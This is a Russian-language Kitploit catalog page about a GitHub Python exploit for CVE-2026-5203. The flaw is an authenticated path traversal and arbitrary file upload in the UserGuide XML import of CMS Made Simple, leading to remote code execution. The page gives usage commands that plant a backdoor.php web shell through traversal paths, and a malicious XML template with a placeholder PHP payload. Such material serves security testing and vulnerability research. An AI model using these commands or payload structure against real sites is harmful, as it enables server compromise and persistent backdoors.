Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-5203 — Python эксплойт для CVE-2026-5203: авторизованный обход пути и произвольная загрузка файлов в CMS Made Simple ≤ 2.22, позволяющая удаленное выполнение кода через развертывание PHP веб-шелла. | Kitploit
Инструменты/GitHubGitHub/caginkyr/cve-2026-5203
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubcaginkyr/cve-2026-5203

CVE-2026-5203

Python эксплойт для CVE-2026-5203: авторизованный обход пути и произвольная загрузка файлов в CMS Made Simple ≤ 2.22, позволяющая удаленное выполнение кода через развертывание PHP веб-шелла.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-5203 — CMS Made Simple ≤ 2.2.22 RCE (Обход пути + Произвольная загрузка файлов)

CVSS Version Type

Краткое описание

Функция импорта XML модуля UserGuide в CMS Made Simple ≤ 2.2.22 не очищает предоставленные пользователем имена файлов, что позволяет аутентифицированному администратору загружать произвольные файлы (например, PHP-веб-шеллы) в любую точку файловой системы сервера с помощью последовательностей обхода пути.

ПолеЗначение
ТипОбход пути / Произвольная загрузка файлов → RCE
КомпонентМодуль UserGuide — Импорт XML
Затрагиваемый файлmodules/UserGuide/lib/class.UserGuideImporterExporter.php
CVSS v3.17.2 HIGH — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Требуется аутентификацияДа (Администратор)

Уязвимый код

root@kitploit:~
// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir    = (string) $xmlFile->isdir;   

Функция записывает содержимое, декодированное из Base64, непосредственно по пути, указанному атакующим.


Использование

root@kitploit:~
python exploit.py <base_url> <admin_url> <username> <password> [upload_path]

Примеры:

root@kitploit:~
# Путь по умолчанию
python exploit.py http://target.com http://target.com/admin admin password123

# Пользовательский путь загрузки
python exploit.py http://target.com http://target.com/admin admin password123 \
  ../../../../../../var/www/html/backdoor.php

Интерактивная оболочка запускается автоматически, если веб-шелл доступен после загрузки.


Вредоносная структура XML

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<modulecontent>
  <module>UserGuide</module>
  <version>1.3</version>
  <files>
    <file>
      <filename>../../../webshell.php</filename>
      <isdir>0</isdir>
      <data>[BASE64_ENCODED_PHP_CODE]</data>
    </file>
  </files>
</modulecontent>
Скачать инструмент